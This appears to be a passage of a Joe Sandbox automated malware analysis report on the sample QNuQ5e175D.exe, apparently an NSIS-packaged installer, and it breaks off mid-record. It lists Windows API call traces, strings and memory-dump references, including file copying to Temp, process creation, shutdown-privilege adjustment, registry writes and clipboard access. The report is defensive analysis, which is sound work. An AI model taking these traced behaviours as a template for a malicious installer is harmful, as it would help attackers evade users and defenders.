                                                        • GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 00403A04
                                                        • DeleteFileW.KERNEL32(00437800), ref: 00403A10
                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A3E
                                                          • Part of subcall function 00406337: MoveFileExW.KERNEL32(?,?,00000005,00405E35,?,00000000,000000F1,?,?,?,?,?), ref: 00406341
                                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\QNuQ5e175D.exe,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A54
                                                          • Part of subcall function 00405B5A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B83
                                                          • Part of subcall function 00405B5A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B90
                                                          • Part of subcall function 004068D4: FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00405F97,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp, 4ou,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,756F3420,C:\Users\user\AppData\Local\Temp\), ref: 004068DF
                                                          • Part of subcall function 004068D4: FindClose.KERNELBASE(00000000), ref: 004068EB
                                                        • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AA2
                                                        • ExitProcess.KERNEL32 ref: 00403ABF
                                                        • CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AC6
                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AE2
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AE9
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AFE
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B21
                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B46
                                                        • ExitProcess.KERNEL32 ref: 00403B69
                                                          • Part of subcall function 00405B25: CreateDirectoryW.KERNELBASE(?,00000000,00403545,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00405B2B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                        • String ID: "C:\Users\user\Desktop\QNuQ5e175D.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres$C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres$C:\Users\user\Desktop$C:\Users\user\Desktop\QNuQ5e175D.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp

                                                        Control-flow Graph

                                                        APIs
                                                        • GetDlgItem.USER32(?,00000403), ref: 00405799
                                                        • GetDlgItem.USER32(?,000003EE), ref: 004057A8
                                                        • GetClientRect.USER32(?,?), ref: 004057E5
                                                        • GetSystemMetrics.USER32(00000002), ref: 004057EC
                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040580D
                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040581E
                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405831
                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040583F
                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405852
                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405874
                                                        • ShowWindow.USER32(?,00000008), ref: 00405888
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004058A9
                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004058B9
                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058D2
                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058DE
                                                        • GetDlgItem.USER32(?,000003F8), ref: 004057B7
                                                          • Part of subcall function 0040452B: SendMessageW.USER32(00000028,?,00000001,00404356), ref: 00404539
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004058FB
                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000056CF,00000000), ref: 00405909
                                                        • CloseHandle.KERNELBASE(00000000), ref: 00405910
                                                        • ShowWindow.USER32(00000000), ref: 00405934
                                                        • ShowWindow.USER32(?,00000008), ref: 00405939
                                                        • ShowWindow.USER32(00000008), ref: 00405983
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004059B7
                                                        • CreatePopupMenu.USER32 ref: 004059C8
                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059DC
                                                        • GetWindowRect.USER32(?,?), ref: 004059FC
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405A15
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A4D
                                                        • OpenClipboard.USER32(00000000), ref: 00405A5D
                                                        • EmptyClipboard.USER32 ref: 00405A63
                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A6F
                                                        • GlobalLock.KERNEL32(00000000), ref: 00405A79
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A8D
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405AAD
                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405AB8
                                                        • CloseClipboard.USER32 ref: 00405ABE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                        • String ID: {
                                                        APIs
                                                          • Part of subcall function 73B012BB: GlobalAlloc.KERNELBASE(00000040,?,73B012DB,?,73B0137F,00000019,73B011CA,-000000A0), ref: 73B012C5
                                                        • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 73B01D2D
                                                        • lstrcpyW.KERNEL32(00000008,?), ref: 73B01D75
                                                        • lstrcpyW.KERNEL32(00000808,?), ref: 73B01D7F
                                                        • GlobalFree.KERNEL32(00000000), ref: 73B01D92
                                                        • GlobalFree.KERNEL32(?), ref: 73B01E74
                                                        • GlobalFree.KERNEL32(?), ref: 73B01E79
                                                        • GlobalFree.KERNEL32(?), ref: 73B01E7E
                                                        • GlobalFree.KERNEL32(00000000), ref: 73B02068
                                                        • lstrcpyW.KERNEL32(?,?), ref: 73B02222
                                                        • GetModuleHandleW.KERNEL32(00000008), ref: 73B022A1
                                                        • LoadLibraryW.KERNEL32(00000008), ref: 73B022B2
                                                        • GetProcAddress.KERNEL32(?,?), ref: 73B0230C
                                                        • lstrlenW.KERNEL32(00000808), ref: 73B02326
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1569059369.0000000073B01000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B00000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73b00000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                        • String ID:

                                                        Control-flow Graph

                                                        APIs
                                                        • DeleteFileW.KERNELBASE(?,?,756F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405CAC
                                                        • lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,756F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405CF4
                                                        • lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,756F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405D17
                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,756F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405D1D
                                                        • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,756F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405D2D
                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DCD
                                                        • FindClose.KERNEL32(00000000), ref: 00405DDC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: "C:\Users\user\Desktop\QNuQ5e175D.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$pB
                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00405F97,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp, 4ou,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,756F3420,C:\Users\user\AppData\Local\Temp\), ref: 004068DF
                                                        • FindClose.KERNELBASE(00000000), ref: 004068EB
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\nsj924C.tmp, xrefs: 004068D4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsj924C.tmp

                                                        Control-flow Graph

                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404033
                                                        • ShowWindow.USER32(?), ref: 00404053
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404065
                                                        • ShowWindow.USER32(?,00000004), ref: 0040407E
                                                        • DestroyWindow.USER32 ref: 00404092
                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 004040AB
                                                        • GetDlgItem.USER32(?,?), ref: 004040CA
                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040DE
                                                        • IsWindowEnabled.USER32(00000000), ref: 004040E5
                                                        • GetDlgItem.USER32(?,00000001), ref: 00404190
                                                        • GetDlgItem.USER32(?,00000002), ref: 0040419A
                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 004041B4
                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404205
                                                        • GetDlgItem.USER32(?,00000003), ref: 004042AB
                                                        • ShowWindow.USER32(00000000,?), ref: 004042CC
                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042DE
                                                        • EnableWindow.USER32(?,?), ref: 004042F9
                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040430F
                                                        • EnableMenuItem.USER32(00000000), ref: 00404316
                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040432E
                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404341
                                                        • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040436B
                                                        • SetWindowTextW.USER32(?,0042CA68), ref: 0040437F
                                                        • ShowWindow.USER32(?,0000000A), ref: 004044B3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                        • String ID:
                                                        • API String ID: 121052019-0

                                                        Control-flow Graph

                                                        [Control-flow graph figure not reproduced; first block 403c49-403c61. Legend: Executed / Not Executed]
                                                        APIs
                                                          • Part of subcall function 0040696B: GetModuleHandleA.KERNEL32(?,00000020,?,00403662,0000000C,?,?,?,?,?,?,?,?), ref: 0040697D
                                                          • Part of subcall function 0040696B: GetProcAddress.KERNEL32(00000000,?), ref: 00406998
                                                        • lstrcatW.KERNEL32(1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,756F3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\QNuQ5e175D.exe",00008001), ref: 00403CCA
                                                        • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,756F3420), ref: 00403D4A
                                                        • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D5D
                                                        • GetFileAttributesW.KERNEL32(Call), ref: 00403D68
                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres), ref: 00403DB1
                                                          • Part of subcall function 004064BE: wsprintfW.USER32 ref: 004064CB
                                                        • RegisterClassW.USER32(004336A0), ref: 00403DEE
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403E06
                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E3B
                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403E71
                                                        • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E9D
                                                        • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403EAA
                                                        • RegisterClassW.USER32(004336A0), ref: 00403EB3
                                                        • DialogBoxParamW.USER32(?,00000000,00403FF7,00000000), ref: 00403ED2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: "C:\Users\user\Desktop\QNuQ5e175D.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                        • API String ID: 1975747703-3434354963

                                                        Control-flow Graph

                                                        [Control-flow graph figure not reproduced; first block 4030a2-4030f0. Legend: Executed / Not Executed]
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 004030B3
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\QNuQ5e175D.exe,00000400), ref: 004030CF
                                                          • Part of subcall function 00406067: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 0040606B
                                                          • Part of subcall function 00406067: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040608D
                                                        • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QNuQ5e175D.exe,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 0040311B
                                                        • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                        • String ID: "C:\Users\user\Desktop\QNuQ5e175D.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\QNuQ5e175D.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                        • API String ID: 2803837635-3711894650

                                                        Control-flow Graph

                                                        [Control-flow graph figure not reproduced; first block 4065b4-4065bd. Legend: Executed / Not Executed]
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004066D6
                                                        • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,?,?,00000000,00000000,00425A20,756F23A0), ref: 004066EC
                                                        • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 0040674A
                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406753
                                                        • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,?,?,00000000,00000000,00425A20,756F23A0), ref: 0040677E
                                                        • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,?,?,00000000,00000000,00425A20,756F23A0), ref: 004067D8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                        • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                        • API String ID: 4024019347-4218209683

                                                        Control-flow Graph

                                                        [Control-flow graph figure not reproduced; first block 4032d9-4032f0. Legend: Executed / Not Executed]
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CountTick$wsprintf
                                                        • String ID: *B$ ZB$ A$ A$... %d%%
                                                        • API String ID: 551687249-3856725213

                                                        Control-flow Graph

                                                        [Control-flow graph figure not reproduced; first block 401794-4017b9. Legend: Executed / Not Executed]
                                                        APIs
                                                        • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres,?,?,00000031), ref: 004017D5
                                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres,?,?,00000031), ref: 004017FA
                                                          • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                          • Part of subcall function 004055FC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                          • Part of subcall function 004055FC: lstrlenW.KERNEL32(0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                          • Part of subcall function 004055FC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,0040343D,0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0), ref: 00405657
                                                          • Part of subcall function 004055FC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll), ref: 00405669
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsj924C.tmp$C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll$C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres$Call

                                                        APIs
                                                        • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                        • lstrlenW.KERNEL32(0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                        • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,0040343D,0040343D,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,00000000,00425A20,756F23A0), ref: 00405657
                                                        • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll), ref: 00405669
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                        • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,?,?,?), ref: 0040277D
                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                        • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                          • Part of subcall function 00406148: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040615E
                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                        • String ID: 9

                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406912
                                                        • wsprintfW.USER32 ref: 0040694D
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406961
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                        • String ID: %s%S.dll$UXTHEME

                                                        APIs
                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CloseEnum$DeleteValue
                                                        • String ID:

                                                        APIs
                                                          • Part of subcall function 73B01BFF: GlobalFree.KERNEL32(?), ref: 73B01E74
                                                          • Part of subcall function 73B01BFF: GlobalFree.KERNEL32(?), ref: 73B01E79
                                                          • Part of subcall function 73B01BFF: GlobalFree.KERNEL32(?), ref: 73B01E7E
                                                        • GlobalFree.KERNEL32(00000000), ref: 73B018C5
                                                        • FreeLibrary.KERNEL32(?), ref: 73B0194B
                                                        • GlobalFree.KERNEL32(00000000), ref: 73B01970
                                                          • Part of subcall function 73B0243E: GlobalAlloc.KERNEL32(00000040,?), ref: 73B0246F
                                                          • Part of subcall function 73B02810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73B01896,00000000), ref: 73B028E0
                                                          • Part of subcall function 73B01666: wsprintfW.USER32 ref: 73B01694
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1569059369.0000000073B01000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B00000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73b00000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                                        • String ID:

                                                        APIs
                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00000023,00000011,00000002), ref: 004024FA
                                                        • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00000000,00000011,00000002), ref: 0040253A
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00000000,00000011,00000002), ref: 00402622
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CloseValuelstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsj924C.tmp
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 004060B4
                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403550,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C), ref: 004060CF
                                                        Strings
                                                        Memory Dump Source
